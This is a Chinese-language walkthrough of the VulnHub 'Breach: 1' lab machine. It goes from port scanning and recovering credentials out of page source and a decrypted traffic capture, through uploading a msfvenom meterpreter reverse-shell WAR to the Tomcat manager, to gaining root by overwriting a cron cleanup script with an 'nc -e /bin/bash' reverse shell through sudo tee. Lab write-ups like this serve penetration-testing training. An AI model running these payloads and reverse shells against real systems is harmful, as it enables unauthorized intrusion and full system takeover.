Breach: 1 ~ VulnHub

1 环境准备

靶机下载地址

  1. win10系统,安装bp;wireshark

  2. 根据提示,靶机设置为仅主机模式,网段192.168.110.0,靶机ip为静态192.168.110.140

  1. 一台kali(192.168.198.172),设置为nat模式,可以连接靶机。

  2. 一台kali(192.168.110.128),设置为仅主机模式。

2 信息搜集

扫描端口:

bash 复制代码
nmap -T4 -A -v 192.168.110.140

出来的端口有很多,尝试从80端口入手,访问80端口进入到网站主页:

查看网页源代码:

发现一段编码,尝试解码:

将base64的解码结果再一次解码:

可以发现,经过两次base64解码后的结果可能是某一个用户名和密码。

cpp 复制代码
pgibbons:damnitfeel$goodtobeagang$ta

网站图片可以访问,进入到图片链接

先进入到 Employee portal ,进入到cms系统:

对impresscms页面尝试指纹识别:

bash 复制代码
whatweb -v http://192.168.110.140/impresscms/

并没有找到cms的版本,但是可以清楚服务器运行的是带有Apache 2.4.7版本的Ubuntu Linux。 这里可以尝试msf搜索impresscms的漏洞数据利用,但是都不能成功。

用刚才发现的用户名和密码登录,可以成功进入到后台页面:

在Inbox中的第三个信中可以下载keystore

主页面找到Content,可以下载.pcap流量包文件:

同时注意到评论中的重要信息:They told me the alias, storepassword and keypassword are all set to 'tomcat'.

3 流量解密

提取证书,根据提示密码是tomcat

bash 复制代码
keytool -importkeystore -srckeystore /root/下载/keystore -destkeystore /root/下载/tomcat.p12 -deststoretype PKCS12 -srcalias tomcat

将证书添加到wireshark中解密流量

发现访问的地址:https://192.168.110.140:8443/_M@nag3Me/html

这个地址不能直接用浏览器访问,只有结合bp绕过浏览器证书,访问该地址

发现一个登录页面,回到刚才的流量数据包,可以找到传输的用户名和密码:

XML 复制代码
tomcat:Tt\5D8F(#!*u=G)4m7zB

成功登录,进入到tomcat后台管理。

4 建立反弹连接

在后台管理中可以上传WAR文件,这里可以上传一个反弹连接的war包建立反弹连接。

用NAT模式下的kali生成payload

bash 复制代码
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.128 lport=4444 -f war -o kali.war

如果是在windows主机上安装的bp,可以通过XFTP把payload传到windows机器上。

在仅主机模式的kali机器上,监听端口 4444

bash 复制代码
 msfconsole
 use exploit/multi/handler
 set payload java/meterpreter/reverse_tcp
 set LHOST 192.168.110.128
 set LPORT 4444
 exploit

在这里将生成好的kali.war传上去,然后访问。注意用bp放包要快,防止被靶机安全措施清理。

成功反弹连接:

获得交互式 shell

bash 复制代码
python -c 'import pty;pty.spawn("/bin/bash")' 

5 提权

查看操作系统版本

查找漏洞

内核版本是 4.2.0 没有找到匹配的。

进入apache网站根目录 /var/www

进入5446文件,发现两个php文件:

获得数据库root用户,密码是空的,直接进入数据库

查询user表的用户密码

将milton用户密码通过md5解密

尝试使用该密码登录用户操作系统,可以成功登录,根目录下有.sh文件,但是没有有用信息。

查看该用户的历史命令

这个用户进入到 blumbergh 用户,需要找到 blumbergh 用户的密码。

可以通过扫描发现网站有一个目录为images

将这个页面的图片全部下载下来分析:

用 strings 分析 bill.png,找到密码为 coffeestains

根据这个密码切换到 blumbergh用户,查看历史命令

有一个 tidyup.sh 的脚本

这个脚本是一种防御措施,而且只有root用户可以修改,每3分钟运行一次,在/var/lib/tomcat6/webapps目录下,使用find命令在swingline目录中查找所有子目录和文件(从第一层到第十层),然后通过xargs rm -rf命令将找到的文件和目录删除。这个操作会删除我们上传的war包。

查看哪些用户有 sudo 权限

使用 tee 命令,双向重定向,可以实现覆盖文件内容。

准备一个反弹连接内容:

bash 复制代码
 echo "nc -e /bin/bash 192.168.110.128 5555" > shell.txt 

将该内容覆盖到tidyup.sh

bash 复制代码
 cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh 

成功拿到root

相关推荐
小镇航海家1 天前
红日靶场1学习笔记
网络·笔记·学习·web安全·渗透测试
廾匸07054 天前
2024上半年网络安全漏洞态势报告
安全·网络安全·安全漏洞·态势报告
lu-fe16 天前
记一次教学版内网渗透流程
网络安全·渗透测试·内网渗透
穿鞋子泡脚8 天前
SSRF漏洞
网络安全·渗透测试·ssrf·web漏洞
HMX4048 天前
【春秋云境】CVE-2024-23897-Jenkins 2.441之前版本存在任意文件读取漏洞
运维·jenkins·安全漏洞
网络安全大白9 天前
黑客入门教程(非常详细)从零基础入门到精通,看完这一篇就够了
网络安全·黑客·渗透测试
HinsCoder16 天前
【渗透测试】——Upload靶场实战(1-5关)
笔记·学习·安全·web安全·渗透测试·测试·upload靶场
晓翔仔19 天前
CORS漏洞及其防御措施:保护Web应用免受攻击
前端·网络安全·渗透测试·cors·漏洞修复·应用安全
文章永久免费只为良心20 天前
SQLmap使用请求包进行sql爆破
数据库·sql·网络安全·渗透测试·红队测试工具
開_punk2558_發22 天前
开源 XDR/SIEM 安全平台,附下载链接
安全·web安全·网络安全·渗透测试·漏洞挖掘·漏洞检测·xdr